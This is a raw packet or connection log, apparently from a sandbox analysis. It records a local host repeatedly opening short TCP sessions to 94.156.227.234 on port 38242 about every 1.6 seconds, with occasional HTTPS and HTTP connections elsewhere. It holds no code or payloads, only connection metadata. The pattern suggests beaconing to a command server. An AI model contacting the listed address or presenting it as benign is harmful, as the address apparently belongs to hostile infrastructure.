Dec 24, 2024 06:28:14.950815916 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:14.950900078 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:14.950932980 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:15.070533037 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:15.455876112 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:15.617227077 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:16.085764885 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:16.085841894 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:16.457082987 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:16.576800108 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:16.576920033 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:16.576973915 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:16.696814060 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:17.080971956 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:17.241005898 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:17.721396923 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:17.721488953 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:18.082027912 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:18.201894045 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:18.201970100 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:18.202044010 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:18.321875095 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:18.706762075 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:18.869122982 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:19.323579073 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:19.323656082 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:19.708163023 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:19.828142881 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:19.828315973 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:19.828316927 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:19.947978020 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:20.333837032 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:20.497085094 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:20.962548018 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:20.962651014 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:21.334852934 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:21.430989027 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 06:28:21.454766035 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:21.454860926 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:21.454941034 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:21.574552059 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:21.958343029 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:22.125129938 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:22.584803104 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:22.584894896 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:22.959439993 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:23.079310894 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:23.079545021 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:23.079545021 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:23.199362993 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:23.583600044 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:23.744973898 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:24.201153994 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:24.201484919 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:24.584527016 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:24.705065012 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:24.705179930 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:24.705179930 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:24.825124025 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:25.209089994 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:25.372948885 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:25.833457947 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:25.833623886 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:26.209894896 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:26.329646111 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:26.329736948 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:26.329737902 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:26.449532986 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:26.833635092 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:26.996961117 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:27.451545954 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:27.451647043 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:27.574107885 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 06:28:27.834521055 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:27.954194069 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:27.954281092 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:27.954313993 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:28.073983908 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:28.457989931 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:28.620980024 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:29.074768066 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:29.074837923 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:29.459491014 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:29.579372883 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:29.579468966 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:29.579554081 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:29.699393988 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:30.084167957 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:30.245099068 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:30.705495119 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:30.705595016 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:31.085351944 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:31.205167055 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:31.205280066 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:31.205380917 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:31.325050116 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:31.710314035 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:31.877017975 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:32.334300041 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:32.334383965 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:32.711415052 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:32.831191063 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:32.831262112 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:32.831289053 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:32.950948954 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:33.335804939 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:33.500932932 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:33.950290918 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:33.950436115 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:34.337485075 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:34.457246065 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:34.457393885 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:34.457437992 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:34.577064991 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:34.962212086 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:35.125293016 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:35.586545944 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:35.586659908 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:35.963747025 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:36.083554029 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:36.083703041 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:36.083852053 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:36.203609943 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:36.590141058 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:36.752928972 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:37.206624031 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:37.206708908 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:37.591639996 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:37.711340904 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:37.711425066 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:37.711445093 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:37.831255913 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:38.218193054 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:38.384944916 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:38.838051081 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:38.838288069 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:39.220309973 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:39.340337992 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:39.340636969 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:39.340636969 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:39.460527897 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:39.846971989 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:40.012912035 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:40.465802908 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:40.466037035 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:40.848869085 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:40.968724966 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:40.968882084 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:40.968924046 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:41.088787079 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:41.475231886 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:41.637166977 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:42.099337101 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:42.099675894 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:42.477164030 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:42.597065926 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:42.597304106 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:42.597541094 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:42.717128992 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:43.104399920 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:43.268852949 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:43.724843979 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:43.725250006 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:44.106801987 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:44.226658106 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:44.226910114 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:44.227109909 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:44.346651077 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:44.736536980 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:44.899533033 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:45.348170042 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:45.348387957 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:45.739315033 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:45.859055042 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:45.859283924 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:45.859302044 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:45.978884935 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:46.368556023 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:46.739552975 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:46.859247923 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:46.981220961 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:46.981560946 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:47.371097088 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:47.619590044 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:47.619838953 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:47.619839907 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:47.739520073 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:48.126776934 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:48.292789936 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:48.742077112 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:48.742376089 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:49.129420996 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:49.249279022 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:49.249425888 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:49.249515057 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:49.369129896 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:49.755625963 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:49.916852951 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:50.383732080 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:50.383881092 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:50.757776976 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:50.877609968 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:50.877926111 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:50.878020048 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:50.997695923 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:51.386188030 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:51.552854061 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:52.003659964 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:52.003870010 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:52.146692038 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:28:52.388312101 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:52.714653015 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:52.714905977 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:52.715095043 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:52.834734917 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:53.222532034 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:53.384907961 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:53.841459036 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:53.841785908 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:54.224658966 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:54.344985962 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:54.345252991 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:54.345366955 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:54.465018034 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:54.853334904 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:55.016751051 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:55.490472078 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:55.490739107 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:55.855598927 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:55.975285053 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:55.975461006 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:55.975562096 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:56.095402956 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:56.483480930 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:56.644886017 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:57.098792076 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:57.099137068 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:57.485996008 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:57.605735064 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:57.606004000 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:57.606004000 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:57.725759983 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:58.112411022 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:58.276700020 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:58.732474089 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:58.732780933 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:59.117079973 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:59.237395048 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:59.237575054 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:59.237741947 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:59.357332945 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:59.747818947 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:59.912812948 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:00.374380112 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:00.374809980 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:00.750906944 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:00.871115923 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:00.871453047 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:00.871454000 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:00.991558075 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:01.378535986 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:01.540891886 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:01.992978096 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:01.993256092 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:02.380882025 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:02.500612974 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:02.500874043 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:02.500874043 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:02.620515108 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:03.009527922 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:03.172756910 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:03.617149115 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:03.617350101 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:04.011586905 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:04.132030964 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:04.132601023 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:04.132601023 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:04.252357006 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:04.641673088 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:04.804708958 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:05.262393951 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:05.262689114 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:05.643657923 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:05.763391972 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:05.763767958 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:05.763767958 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:05.883583069 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:06.269236088 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:06.432665110 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:06.900621891 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:06.900918007 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:07.270920038 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:07.390799046 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:07.390948057 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:07.391134977 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:07.510781050 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:07.899658918 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:08.064729929 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:08.524852037 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:08.525100946 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:08.902025938 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:09.022705078 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:09.022813082 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:09.023052931 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:09.143739939 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:09.529443979 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:09.692728043 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:10.149300098 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:10.149563074 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:10.531538010 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:10.652077913 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:10.652328014 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:10.652380943 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:10.773107052 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:11.157155991 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:11.320650101 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:11.770178080 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:11.770428896 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:12.159310102 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:12.279100895 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:12.279335976 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:12.279335976 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:12.399151087 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:12.787353992 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:12.948611021 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:13.407295942 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:13.407582998 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:13.789362907 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:13.909086943 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:13.909272909 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:13.909272909 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:14.029046059 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:14.415945053 CET	60126	38242	192.168.2.23	94.156.227.234
